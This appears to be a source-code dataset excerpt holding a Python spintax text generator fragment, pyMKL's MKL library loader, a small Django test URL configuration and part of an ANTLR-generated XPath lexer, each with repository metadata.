middle_string=middle_string.split('|') #we split the alternative texts by '|' because each is a viable solution
rand=random.randint(0,len(middle_string)-1) #generate a random number representing the index of the chosen alternative text
return middle_string[rand] #we now have chosen the alternative text, and we return it
while index<len(string):#set stop condition
if string[index]=='{':
stack.append(index) #record the index of "{" in stack, and later on when we meet "}" we pop it from stack
index+=1
elif string[index]=="}":
start_index=stack.pop()
"""
we meet the first matching "}" for "{", thus we pop the index on top of the stack and extract the substring
between the start_index and end_index and generate alternative text within it--I use random generator
"""
end_index=index
before_string=string[:start_index] #we keep track of the substring before the substring we want to modify
            after_string=string[end_index+1:]#we keep track of the substring after the substring we want to modify
middle_string=helper(string,start_index,end_index)#we use the helper function to help modify and decide on the alternative text we want to input in the text
string=before_string+middle_string+after_string
            index=len(before_string)+len(middle_string) #resume scanning right after the substituted text
else: # we keep increasing the index pointer
index+=1
return string
string="{I am|I'm} {working on|starting} this {online |}interview. I hope Cortx thinks I am {{very|extremely} qualified|great|awesome}{!|.}"
print(find_alter(string))
| 42.054795
| 168
| 0.656678
|
794fcc625e953aa2835dede95b32432878ae2964
| 973
|
py
|
Python
|
pyMKL/loadMKL.py
|
jcapriot/pyMKL
|
4b960585903bc1504dec2e37aa09d67849986322
|
[
"MIT"
] | 10
|
2016-05-18T09:33:39.000Z
|
2021-03-13T07:10:46.000Z
|
pyMKL/loadMKL.py
|
jcapriot/pyMKL
|
4b960585903bc1504dec2e37aa09d67849986322
|
[
"MIT"
] | 10
|
2016-04-29T16:07:21.000Z
|
2022-01-02T19:15:06.000Z
|
pyMKL/loadMKL.py
|
jcapriot/pyMKL
|
4b960585903bc1504dec2e37aa09d67849986322
|
[
"MIT"
] | 16
|
2016-04-29T14:14:38.000Z
|
2022-01-04T11:52:56.000Z
|
from ctypes import CDLL, RTLD_GLOBAL
import sys, os
platform = sys.platform
libname = {'linux':'libmkl_rt.so', # works for python3 on linux
'linux2':'libmkl_rt.so', # works for python2 on linux
'darwin':'libmkl_rt.dylib',
'win32':'mkl_rt.dll'}
def _loadMKL():
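    # Locate the MKL runtime: first on the regular loader search path, then inside an Anaconda install.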
try:
# Look for MKL in path
MKLlib = CDLL(libname[platform])
except:
try:
# Look for anaconda mkl
if 'Anaconda' in sys.version:
if platform in ['linux', 'linux2','darwin']:
libpath = ['/']+sys.executable.split('/')[:-2] + \
['lib',libname[platform]]
elif platform == 'win32':
libpath = sys.executable.split(os.sep)[:-1] + \
['Library','bin',libname[platform]]
MKLlib = CDLL(os.path.join(*libpath))
except Exception as e:
raise e
return MKLlib
| 32.433333
| 70
| 0.505653
|
794fcda35dce03ecd1e5700c24b77d104458f143
| 535
|
py
|
Python
|
test_app/urls.py
|
benzkji/django-minimalist-cms
|
b25024c489e2be3fb3a7f664a2535592fd89d08c
|
[
"MIT"
] | null | null | null |
test_app/urls.py
|
benzkji/django-minimalist-cms
|
b25024c489e2be3fb3a7f664a2535592fd89d08c
|
[
"MIT"
] | 8
|
2019-01-10T11:59:06.000Z
|
2019-10-22T17:25:36.000Z
|
test_app/urls.py
|
benzkji/django-minimalist-cms
|
b25024c489e2be3fb3a7f664a2535592fd89d08c
|
[
"MIT"
] | 1
|
2019-04-09T11:18:36.000Z
|
2019-04-09T11:18:36.000Z
|
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import url, include
from django.contrib import admin
from django.conf.urls.static import static
from test_app.views import TestModelView
admin.autodiscover()
urlpatterns = [
url(r'^$', TestModelView.as_view(), name='test_view'),
url(
r'^admin/', admin.site.urls
),
]
if settings.DEBUG and settings.MEDIA_ROOT:
urlpatterns += static(
settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT
)
| 20.576923
| 58
| 0.721495
|
794fce11a66db5cfcee95b74dfac9cd163d5f7e6
| 20,649
|
py
|
Python
|
xpath/compilerv1/XPathLexer.py
|
cs4221/xpath
|
55cbfe7e7e0d4ec0edd85cf0cb5fa9c0320356e6
|
[
"Unlicense"
] | null | null | null |
xpath/compilerv1/XPathLexer.py
|
cs4221/xpath
|
55cbfe7e7e0d4ec0edd85cf0cb5fa9c0320356e6
|
[
"Unlicense"
] | null | null | null |
xpath/compilerv1/XPathLexer.py
|
cs4221/xpath
|
55cbfe7e7e0d4ec0edd85cf0cb5fa9c0320356e6
|
[
"Unlicense"
] | null | null | null |
# Generated from .\xpath\xpathgrammer\XPath.g4 by ANTLR 4.9.3
from antlr4 import *
from io import StringIO
import sys
if sys.version_info[1] > 5:
from typing import TextIO
else:
from typing.io import TextIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2A")
buf.write("\u01ed\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\3\2\3\2\3\2\3\2\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3")
buf.write("\3\3\3\3\3\3\5\3\u0098\n\3\3\4\3\4\7\4\u009c\n\4\f\4\16")
buf.write("\4\u009f\13\4\3\5\6\5\u00a2\n\5\r\5\16\5\u00a3\3\6\3\6")
buf.write("\3\6\3\6\3\6\3\6\5\6\u00ac\n\6\3\7\3\7\3\7\3\7\5\7\u00b2")
buf.write("\n\7\3\b\3\b\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\f\3\r")
buf.write("\3\r\3\16\3\16\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\21")
buf.write("\3\22\3\22\3\23\3\23\3\23\3\24\3\24\3\25\3\25\3\25\3\26")
buf.write("\3\26\3\27\3\27\3\27\3\30\3\30\3\30\3\31\3\31\3\32\3\32")
buf.write("\3\32\3\33\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\36")
buf.write("\3\37\3\37\3 \3 \3!\3!\3\"\3\"\3#\3#\3$\3$\3%\3%\3%\3")
buf.write("&\3&\3\'\3\'\3\'\3(\3(\3)\3)\3)\3*\3*\3+\3+\3+\3+\3+\3")
buf.write("+\3+\3+\3+\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3")
buf.write(",\3,\3,\3-\3-\3-\3-\3.\3.\3.\3.\3.\3.\3.\3.\3.\3.\3/\3")
buf.write("/\3/\3/\3/\3/\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60")
buf.write("\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61")
buf.write("\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62")
buf.write("\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\63\3\63\3\63")
buf.write("\3\63\3\63\3\63\3\63\3\63\3\63\3\63\3\64\3\64\3\64\3\64")
buf.write("\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64")
buf.write("\3\64\3\64\3\64\3\65\3\65\3\65\3\65\3\65\3\66\3\66\3\66")
buf.write("\3\66\3\67\3\67\3\67\38\38\38\38\38\38\38\39\39\39\39")
buf.write("\39\39\39\39\39\39\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3")
buf.write(":\3:\3:\3:\3:\3:\3:\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3")
buf.write(";\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3<\3<\3<\3<\3<\3=\3")
buf.write("=\3=\3=\3=\3>\3>\3?\3?\3?\7?\u01cc\n?\f?\16?\u01cf\13")
buf.write("?\3?\3?\3?\3?\7?\u01d5\n?\f?\16?\u01d8\13?\3?\5?\u01db")
buf.write("\n?\3@\3@\3@\3A\3A\3B\6B\u01e3\nB\rB\16B\u01e4\3C\6C\u01e8")
buf.write("\nC\rC\16C\u01e9\3C\3C\4\u01cd\u01d6\2D\3\3\5\4\7\5\t")
buf.write("\6\13\7\r\b\17\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20")
buf.write("\37\21!\22#\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65")
buf.write("\34\67\359\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-Y.[/]\60")
buf.write("_\61a\62c\63e\64g\65i\66k\67m8o9q:s;u<w=y>{?}@\177\2\u0081")
buf.write("\2\u0083\2\u0085A\3\2\b\5\2C\\aac|\7\2/\60\62;C\\aac|")
buf.write("\4\2$$``\3\2))\3\2\62;\5\2\13\f\16\17\"\"\2\u0205\2\3")
buf.write("\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3\2\2\2\2\13\3\2")
buf.write("\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2\2\2\2\23\3\2\2")
buf.write("\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2\2\2\33\3\2\2\2")
buf.write("\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2#\3\2\2\2\2%\3")
buf.write("\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2\2-\3\2\2\2\2")
buf.write("/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65\3\2\2\2\2\67")
buf.write("\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2\2?\3\2\2\2\2")
buf.write("A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2\2\2I\3\2\2\2")
buf.write("\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2\2\2\2S\3\2\2")
buf.write("\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3\2\2\2\2]\3\2")
buf.write("\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2\2e\3\2\2\2\2g\3")
buf.write("\2\2\2\2i\3\2\2\2\2k\3\2\2\2\2m\3\2\2\2\2o\3\2\2\2\2q")
buf.write("\3\2\2\2\2s\3\2\2\2\2u\3\2\2\2\2w\3\2\2\2\2y\3\2\2\2\2")
buf.write("{\3\2\2\2\2}\3\2\2\2\2\u0085\3\2\2\2\3\u0087\3\2\2\2\5")
buf.write("\u0097\3\2\2\2\7\u0099\3\2\2\2\t\u00a1\3\2\2\2\13\u00ab")
buf.write("\3\2\2\2\r\u00b1\3\2\2\2\17\u00b3\3\2\2\2\21\u00b5\3\2")
buf.write("\2\2\23\u00b7\3\2\2\2\25\u00b9\3\2\2\2\27\u00bb\3\2\2")
buf.write("\2\31\u00be\3\2\2\2\33\u00c0\3\2\2\2\35\u00c3\3\2\2\2")
buf.write("\37\u00c5\3\2\2\2!\u00c7\3\2\2\2#\u00ca\3\2\2\2%\u00cc")
buf.write("\3\2\2\2\'\u00cf\3\2\2\2)\u00d1\3\2\2\2+\u00d4\3\2\2\2")
buf.write("-\u00d6\3\2\2\2/\u00d9\3\2\2\2\61\u00dc\3\2\2\2\63\u00de")
buf.write("\3\2\2\2\65\u00e1\3\2\2\2\67\u00e4\3\2\2\29\u00e6\3\2")
buf.write("\2\2;\u00e8\3\2\2\2=\u00eb\3\2\2\2?\u00ed\3\2\2\2A\u00ef")
buf.write("\3\2\2\2C\u00f1\3\2\2\2E\u00f3\3\2\2\2G\u00f5\3\2\2\2")
buf.write("I\u00f7\3\2\2\2K\u00fa\3\2\2\2M\u00fc\3\2\2\2O\u00ff\3")
buf.write("\2\2\2Q\u0101\3\2\2\2S\u0104\3\2\2\2U\u0106\3\2\2\2W\u010f")
buf.write("\3\2\2\2Y\u0120\3\2\2\2[\u0124\3\2\2\2]\u012e\3\2\2\2")
buf.write("_\u0134\3\2\2\2a\u013c\3\2\2\2c\u0147\3\2\2\2e\u015a\3")
buf.write("\2\2\2g\u0164\3\2\2\2i\u0176\3\2\2\2k\u017b\3\2\2\2m\u017f")
buf.write("\3\2\2\2o\u0182\3\2\2\2q\u0189\3\2\2\2s\u0193\3\2\2\2")
buf.write("u\u01a5\3\2\2\2w\u01bc\3\2\2\2y\u01c1\3\2\2\2{\u01c6\3")
buf.write("\2\2\2}\u01da\3\2\2\2\177\u01dc\3\2\2\2\u0081\u01df\3")
buf.write("\2\2\2\u0083\u01e2\3\2\2\2\u0085\u01e7\3\2\2\2\u0087\u0088")
buf.write("\7f\2\2\u0088\u0089\7q\2\2\u0089\u008a\7e\2\2\u008a\4")
buf.write("\3\2\2\2\u008b\u0098\5U+\2\u008c\u0098\5W,\2\u008d\u0098")
buf.write("\5[.\2\u008e\u0098\5]/\2\u008f\u0098\5a\61\2\u0090\u0098")
buf.write("\5c\62\2\u0091\u0098\5e\63\2\u0092\u0098\5g\64\2\u0093")
buf.write("\u0098\5o8\2\u0094\u0098\5q9\2\u0095\u0098\5s:\2\u0096")
buf.write("\u0098\5w<\2\u0097\u008b\3\2\2\2\u0097\u008c\3\2\2\2\u0097")
buf.write("\u008d\3\2\2\2\u0097\u008e\3\2\2\2\u0097\u008f\3\2\2\2")
buf.write("\u0097\u0090\3\2\2\2\u0097\u0091\3\2\2\2\u0097\u0092\3")
buf.write("\2\2\2\u0097\u0093\3\2\2\2\u0097\u0094\3\2\2\2\u0097\u0095")
buf.write("\3\2\2\2\u0097\u0096\3\2\2\2\u0098\6\3\2\2\2\u0099\u009d")
buf.write("\t\2\2\2\u009a\u009c\t\3\2\2\u009b\u009a\3\2\2\2\u009c")
buf.write("\u009f\3\2\2\2\u009d\u009b\3\2\2\2\u009d\u009e\3\2\2\2")
buf.write("\u009e\b\3\2\2\2\u009f\u009d\3\2\2\2\u00a0\u00a2\t\3\2")
buf.write("\2\u00a1\u00a0\3\2\2\2\u00a2\u00a3\3\2\2\2\u00a3\u00a1")
buf.write("\3\2\2\2\u00a3\u00a4\3\2\2\2\u00a4\n\3\2\2\2\u00a5\u00ac")
buf.write("\5+\26\2\u00a6\u00ac\5\67\34\2\u00a7\u00ac\5\61\31\2\u00a8")
buf.write("\u00ac\5\63\32\2\u00a9\u00ac\5-\27\2\u00aa\u00ac\5;\36")
buf.write("\2\u00ab\u00a5\3\2\2\2\u00ab\u00a6\3\2\2\2\u00ab\u00a7")
buf.write("\3\2\2\2\u00ab\u00a8\3\2\2\2\u00ab\u00a9\3\2\2\2\u00ab")
buf.write("\u00aa\3\2\2\2\u00ac\f\3\2\2\2\u00ad\u00b2\5m\67\2\u00ae")
buf.write("\u00b2\5Y-\2\u00af\u00b2\5k\66\2\u00b0\u00b2\5C\"\2\u00b1")
buf.write("\u00ad\3\2\2\2\u00b1\u00ae\3\2\2\2\u00b1\u00af\3\2\2\2")
buf.write("\u00b1\u00b0\3\2\2\2\u00b2\16\3\2\2\2\u00b3\u00b4\7B\2")
buf.write("\2\u00b4\20\3\2\2\2\u00b5\u00b6\7#\2\2\u00b6\22\3\2\2")
buf.write("\2\u00b7\u00b8\7_\2\2\u00b8\24\3\2\2\2\u00b9\u00ba\7\177")
buf.write("\2\2\u00ba\26\3\2\2\2\u00bb\u00bc\7<\2\2\u00bc\u00bd\7")
buf.write("?\2\2\u00bd\30\3\2\2\2\u00be\u00bf\7<\2\2\u00bf\32\3\2")
buf.write("\2\2\u00c0\u00c1\7<\2\2\u00c1\u00c2\7<\2\2\u00c2\34\3")
buf.write("\2\2\2\u00c3\u00c4\7.\2\2\u00c4\36\3\2\2\2\u00c5\u00c6")
buf.write("\7+\2\2\u00c6 \3\2\2\2\u00c7\u00c8\7<\2\2\u00c8\u00c9")
buf.write("\7,\2\2\u00c9\"\3\2\2\2\u00ca\u00cb\7\60\2\2\u00cb$\3")
buf.write("\2\2\2\u00cc\u00cd\7\60\2\2\u00cd\u00ce\7\60\2\2\u00ce")
buf.write("&\3\2\2\2\u00cf\u00d0\7&\2\2\u00d0(\3\2\2\2\u00d1\u00d2")
buf.write("\7?\2\2\u00d2\u00d3\7@\2\2\u00d3*\3\2\2\2\u00d4\u00d5")
buf.write("\7?\2\2\u00d5,\3\2\2\2\u00d6\u00d7\7@\2\2\u00d7\u00d8")
buf.write("\7?\2\2\u00d8.\3\2\2\2\u00d9\u00da\7@\2\2\u00da\u00db")
buf.write("\7@\2\2\u00db\60\3\2\2\2\u00dc\u00dd\7@\2\2\u00dd\62\3")
buf.write("\2\2\2\u00de\u00df\7>\2\2\u00df\u00e0\7?\2\2\u00e0\64")
buf.write("\3\2\2\2\u00e1\u00e2\7>\2\2\u00e2\u00e3\7>\2\2\u00e3\66")
buf.write("\3\2\2\2\u00e4\u00e5\7>\2\2\u00e58\3\2\2\2\u00e6\u00e7")
buf.write("\7/\2\2\u00e7:\3\2\2\2\u00e8\u00e9\7#\2\2\u00e9\u00ea")
buf.write("\7?\2\2\u00ea<\3\2\2\2\u00eb\u00ec\7]\2\2\u00ec>\3\2\2")
buf.write("\2\u00ed\u00ee\7}\2\2\u00ee@\3\2\2\2\u00ef\u00f0\7*\2")
buf.write("\2\u00f0B\3\2\2\2\u00f1\u00f2\7~\2\2\u00f2D\3\2\2\2\u00f3")
buf.write("\u00f4\7-\2\2\u00f4F\3\2\2\2\u00f5\u00f6\7%\2\2\u00f6")
buf.write("H\3\2\2\2\u00f7\u00f8\7~\2\2\u00f8\u00f9\7~\2\2\u00f9")
buf.write("J\3\2\2\2\u00fa\u00fb\7A\2\2\u00fbL\3\2\2\2\u00fc\u00fd")
buf.write("\7,\2\2\u00fd\u00fe\7<\2\2\u00feN\3\2\2\2\u00ff\u0100")
buf.write("\7\61\2\2\u0100P\3\2\2\2\u0101\u0102\7\61\2\2\u0102\u0103")
buf.write("\7\61\2\2\u0103R\3\2\2\2\u0104\u0105\7,\2\2\u0105T\3\2")
buf.write("\2\2\u0106\u0107\7c\2\2\u0107\u0108\7p\2\2\u0108\u0109")
buf.write("\7e\2\2\u0109\u010a\7g\2\2\u010a\u010b\7u\2\2\u010b\u010c")
buf.write("\7v\2\2\u010c\u010d\7q\2\2\u010d\u010e\7t\2\2\u010eV\3")
buf.write("\2\2\2\u010f\u0110\7c\2\2\u0110\u0111\7p\2\2\u0111\u0112")
buf.write("\7e\2\2\u0112\u0113\7g\2\2\u0113\u0114\7u\2\2\u0114\u0115")
buf.write("\7v\2\2\u0115\u0116\7q\2\2\u0116\u0117\7t\2\2\u0117\u0118")
buf.write("\7/\2\2\u0118\u0119\7q\2\2\u0119\u011a\7t\2\2\u011a\u011b")
buf.write("\7/\2\2\u011b\u011c\7u\2\2\u011c\u011d\7g\2\2\u011d\u011e")
buf.write("\7n\2\2\u011e\u011f\7h\2\2\u011fX\3\2\2\2\u0120\u0121")
buf.write("\7c\2\2\u0121\u0122\7p\2\2\u0122\u0123\7f\2\2\u0123Z\3")
buf.write("\2\2\2\u0124\u0125\7c\2\2\u0125\u0126\7v\2\2\u0126\u0127")
buf.write("\7v\2\2\u0127\u0128\7t\2\2\u0128\u0129\7k\2\2\u0129\u012a")
buf.write("\7d\2\2\u012a\u012b\7w\2\2\u012b\u012c\7v\2\2\u012c\u012d")
buf.write("\7g\2\2\u012d\\\3\2\2\2\u012e\u012f\7e\2\2\u012f\u0130")
buf.write("\7j\2\2\u0130\u0131\7k\2\2\u0131\u0132\7n\2\2\u0132\u0133")
buf.write("\7f\2\2\u0133^\3\2\2\2\u0134\u0135\7e\2\2\u0135\u0136")
buf.write("\7q\2\2\u0136\u0137\7o\2\2\u0137\u0138\7o\2\2\u0138\u0139")
buf.write("\7g\2\2\u0139\u013a\7p\2\2\u013a\u013b\7v\2\2\u013b`\3")
buf.write("\2\2\2\u013c\u013d\7f\2\2\u013d\u013e\7g\2\2\u013e\u013f")
buf.write("\7u\2\2\u013f\u0140\7e\2\2\u0140\u0141\7g\2\2\u0141\u0142")
buf.write("\7p\2\2\u0142\u0143\7f\2\2\u0143\u0144\7c\2\2\u0144\u0145")
buf.write("\7p\2\2\u0145\u0146\7v\2\2\u0146b\3\2\2\2\u0147\u0148")
buf.write("\7f\2\2\u0148\u0149\7g\2\2\u0149\u014a\7u\2\2\u014a\u014b")
buf.write("\7e\2\2\u014b\u014c\7g\2\2\u014c\u014d\7p\2\2\u014d\u014e")
buf.write("\7f\2\2\u014e\u014f\7c\2\2\u014f\u0150\7p\2\2\u0150\u0151")
buf.write("\7v\2\2\u0151\u0152\7/\2\2\u0152\u0153\7q\2\2\u0153\u0154")
buf.write("\7t\2\2\u0154\u0155\7/\2\2\u0155\u0156\7u\2\2\u0156\u0157")
buf.write("\7g\2\2\u0157\u0158\7n\2\2\u0158\u0159\7h\2\2\u0159d\3")
buf.write("\2\2\2\u015a\u015b\7h\2\2\u015b\u015c\7q\2\2\u015c\u015d")
buf.write("\7n\2\2\u015d\u015e\7n\2\2\u015e\u015f\7q\2\2\u015f\u0160")
buf.write("\7y\2\2\u0160\u0161\7k\2\2\u0161\u0162\7p\2\2\u0162\u0163")
buf.write("\7i\2\2\u0163f\3\2\2\2\u0164\u0165\7h\2\2\u0165\u0166")
buf.write("\7q\2\2\u0166\u0167\7n\2\2\u0167\u0168\7n\2\2\u0168\u0169")
buf.write("\7q\2\2\u0169\u016a\7y\2\2\u016a\u016b\7k\2\2\u016b\u016c")
buf.write("\7p\2\2\u016c\u016d\7i\2\2\u016d\u016e\7/\2\2\u016e\u016f")
buf.write("\7u\2\2\u016f\u0170\7k\2\2\u0170\u0171\7d\2\2\u0171\u0172")
buf.write("\7n\2\2\u0172\u0173\7k\2\2\u0173\u0174\7p\2\2\u0174\u0175")
buf.write("\7i\2\2\u0175h\3\2\2\2\u0176\u0177\7p\2\2\u0177\u0178")
buf.write("\7q\2\2\u0178\u0179\7f\2\2\u0179\u017a\7g\2\2\u017aj\3")
buf.write("\2\2\2\u017b\u017c\7p\2\2\u017c\u017d\7q\2\2\u017d\u017e")
buf.write("\7v\2\2\u017el\3\2\2\2\u017f\u0180\7q\2\2\u0180\u0181")
buf.write("\7t\2\2\u0181n\3\2\2\2\u0182\u0183\7r\2\2\u0183\u0184")
buf.write("\7c\2\2\u0184\u0185\7t\2\2\u0185\u0186\7g\2\2\u0186\u0187")
buf.write("\7p\2\2\u0187\u0188\7v\2\2\u0188p\3\2\2\2\u0189\u018a")
buf.write("\7r\2\2\u018a\u018b\7t\2\2\u018b\u018c\7g\2\2\u018c\u018d")
buf.write("\7e\2\2\u018d\u018e\7g\2\2\u018e\u018f\7f\2\2\u018f\u0190")
buf.write("\7k\2\2\u0190\u0191\7p\2\2\u0191\u0192\7i\2\2\u0192r\3")
buf.write("\2\2\2\u0193\u0194\7r\2\2\u0194\u0195\7t\2\2\u0195\u0196")
buf.write("\7g\2\2\u0196\u0197\7e\2\2\u0197\u0198\7g\2\2\u0198\u0199")
buf.write("\7f\2\2\u0199\u019a\7k\2\2\u019a\u019b\7p\2\2\u019b\u019c")
buf.write("\7i\2\2\u019c\u019d\7/\2\2\u019d\u019e\7u\2\2\u019e\u019f")
buf.write("\7k\2\2\u019f\u01a0\7d\2\2\u01a0\u01a1\7n\2\2\u01a1\u01a2")
buf.write("\7k\2\2\u01a2\u01a3\7p\2\2\u01a3\u01a4\7i\2\2\u01a4t\3")
buf.write("\2\2\2\u01a5\u01a6\7r\2\2\u01a6\u01a7\7t\2\2\u01a7\u01a8")
buf.write("\7q\2\2\u01a8\u01a9\7e\2\2\u01a9\u01aa\7g\2\2\u01aa\u01ab")
buf.write("\7u\2\2\u01ab\u01ac\7u\2\2\u01ac\u01ad\7k\2\2\u01ad\u01ae")
buf.write("\7p\2\2\u01ae\u01af\7i\2\2\u01af\u01b0\7/\2\2\u01b0\u01b1")
buf.write("\7k\2\2\u01b1\u01b2\7p\2\2\u01b2\u01b3\7u\2\2\u01b3\u01b4")
buf.write("\7v\2\2\u01b4\u01b5\7t\2\2\u01b5\u01b6\7w\2\2\u01b6\u01b7")
buf.write("\7e\2\2\u01b7\u01b8\7v\2\2\u01b8\u01b9\7k\2\2\u01b9\u01ba")
buf.write("\7q\2\2\u01ba\u01bb\7p\2\2\u01bbv\3\2\2\2\u01bc\u01bd")
buf.write("\7u\2\2\u01bd\u01be\7g\2\2\u01be\u01bf\7n\2\2\u01bf\u01c0")
buf.write("\7h\2\2\u01c0x\3\2\2\2\u01c1\u01c2\7v\2\2\u01c2\u01c3")
buf.write("\7g\2\2\u01c3\u01c4\7z\2\2\u01c4\u01c5\7v\2\2\u01c5z\3")
buf.write("\2\2\2\u01c6\u01c7\5\u0083B\2\u01c7|\3\2\2\2\u01c8\u01cd")
buf.write("\7$\2\2\u01c9\u01cc\5\177@\2\u01ca\u01cc\n\4\2\2\u01cb")
buf.write("\u01c9\3\2\2\2\u01cb\u01ca\3\2\2\2\u01cc\u01cf\3\2\2\2")
buf.write("\u01cd\u01ce\3\2\2\2\u01cd\u01cb\3\2\2\2\u01ce\u01d0\3")
buf.write("\2\2\2\u01cf\u01cd\3\2\2\2\u01d0\u01db\7$\2\2\u01d1\u01d6")
buf.write("\7)\2\2\u01d2\u01d5\5\u0081A\2\u01d3\u01d5\n\5\2\2\u01d4")
buf.write("\u01d2\3\2\2\2\u01d4\u01d3\3\2\2\2\u01d5\u01d8\3\2\2\2")
buf.write("\u01d6\u01d7\3\2\2\2\u01d6\u01d4\3\2\2\2\u01d7\u01d9\3")
buf.write("\2\2\2\u01d8\u01d6\3\2\2\2\u01d9\u01db\7)\2\2\u01da\u01c8")
buf.write("\3\2\2\2\u01da\u01d1\3\2\2\2\u01db~\3\2\2\2\u01dc\u01dd")
buf.write("\7$\2\2\u01dd\u01de\7$\2\2\u01de\u0080\3\2\2\2\u01df\u01e0")
buf.write("\7)\2\2\u01e0\u0082\3\2\2\2\u01e1\u01e3\t\6\2\2\u01e2")
buf.write("\u01e1\3\2\2\2\u01e3\u01e4\3\2\2\2\u01e4\u01e2\3\2\2\2")
buf.write("\u01e4\u01e5\3\2\2\2\u01e5\u0084\3\2\2\2\u01e6\u01e8\t")
buf.write("\7\2\2\u01e7\u01e6\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9\u01e7")
buf.write("\3\2\2\2\u01e9\u01ea\3\2\2\2\u01ea\u01eb\3\2\2\2\u01eb")
buf.write("\u01ec\bC\2\2\u01ec\u0086\3\2\2\2\17\2\u0097\u009d\u00a3")
buf.write("\u00ab\u00b1\u01cb\u01cd\u01d4\u01d6\u01da\u01e4\u01e9")
buf.write("\3\b\2\2")
return buf.getvalue()
class XPathLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
AXES = 2
NODE_NAME = 3
DOCUMENT_NAME = 4
PREDICATE_OPERATOR = 5
PREDICATE_CONNECTIVES = 6
AT = 7
BANG = 8
CB = 9
CC = 10
CEQ = 11
COLON = 12
COLONCOLON = 13
COMMA = 14
CP = 15
CS = 16
D = 17
DD = 18
DOLLAR = 19
EG = 20
EQ = 21
GE = 22
GG = 23
GT = 24
LE = 25
LL = 26
LT = 27
MINUS = 28
NE = 29
OB = 30
OC = 31
OP = 32
P = 33
PLUS = 34
POUND = 35
PP = 36
QM = 37
SC = 38
SLASH = 39
SS = 40
STAR = 41
KW_ANCESTOR = 42
KW_ANCESTOR_OR_SELF = 43
KW_AND = 44
KW_ATTRIBUTE = 45
KW_CHILD = 46
KW_COMMENT = 47
KW_DESCENDANT = 48
KW_DESCENDANT_OR_SELF = 49
KW_FOLLOWING = 50
KW_FOLLOWING_SIBLING = 51
KW_NODE = 52
KW_NOT = 53
KW_OR = 54
KW_PARENT = 55
KW_PRECEDING = 56
KW_PRECEDING_SIBLING = 57
KW_PROCESSING_INSTRUCTION = 58
KW_SELF = 59
KW_TEXT = 60
IntegerLiteral = 61
StringLiteral = 62
WS = 63
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'doc'", "'@'", "'!'", "']'", "'}'", "':='", "':'", "'::'",
"','", "')'", "':*'", "'.'", "'..'", "'$'", "'=>'", "'='", "'>='",
"'>>'", "'>'", "'<='", "'<<'", "'<'", "'-'", "'!='", "'['",
"'{'", "'('", "'|'", "'+'", "'#'", "'||'", "'?'", "'*:'", "'/'",
"'//'", "'*'", "'ancestor'", "'ancestor-or-self'", "'and'",
"'attribute'", "'child'", "'comment'", "'descendant'", "'descendant-or-self'",
"'following'", "'following-sibling'", "'node'", "'not'", "'or'",
"'parent'", "'preceding'", "'preceding-sibling'", "'processing-instruction'",
"'self'", "'text'" ]
symbolicNames = [ "<INVALID>",
"AXES", "NODE_NAME", "DOCUMENT_NAME", "PREDICATE_OPERATOR",
"PREDICATE_CONNECTIVES", "AT", "BANG", "CB", "CC", "CEQ", "COLON",
"COLONCOLON", "COMMA", "CP", "CS", "D", "DD", "DOLLAR", "EG",
"EQ", "GE", "GG", "GT", "LE", "LL", "LT", "MINUS", "NE", "OB",
